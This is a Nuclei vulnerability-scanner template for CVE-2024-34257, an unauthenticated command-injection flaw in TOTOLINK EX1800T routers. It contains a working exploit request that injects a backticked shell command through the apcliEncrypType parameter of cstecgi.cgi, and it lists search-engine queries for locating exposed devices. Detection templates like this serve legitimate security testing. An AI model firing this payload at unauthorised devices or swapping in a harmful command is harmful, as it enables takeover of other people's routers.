59 lines
1.8 KiB
YAML
59 lines
1.8 KiB
YAML
id: CVE-2024-34257
|
|
|
|
info:
|
|
name: TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection
|
|
author: pussycat0x
|
|
severity: high
|
|
description: |
|
|
TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.
|
|
reference:
|
|
- https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md
|
|
- https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350
|
|
- https://github.com/20142995/nuclei-templates
|
|
classification:
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.0926
|
|
metadata:
|
|
vendor: totolink
|
|
product: a3700r_firmware
|
|
shodan-query: http.title:"totolink"
|
|
fofa-query: title="totolink"
|
|
google-query: intitle:"totolink"
|
|
tags: cve,cve2024,rce,unauth
|
|
|
|
variables:
|
|
file: "{{rand_base(6)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /cgi-bin/cstecgi.cgi HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{RootURL}}
|
|
Referer: {{RootURL}}/page/index.html
|
|
|
|
{
|
|
"token":"",
|
|
"apcliEncrypType":"`id>../{{file}}.txt`",
|
|
"topicurl":"setWiFiExtenderConfig"
|
|
}
|
|
- |
|
|
GET /{{file}}.txt HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_1
|
|
words:
|
|
- '"success": true'
|
|
|
|
- type: regex
|
|
part: body_2
|
|
regex:
|
|
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022055626dc912a0f417ae790a1b7f990a2b3cf95e22f8ba964c7d032fbee8b697f502200ec6da65f291cccddaaac0b9998cdeb9cc8179b2115e8bcad0d49d15c815f7fa:922c64590222798bb761d5b6d8e72950 |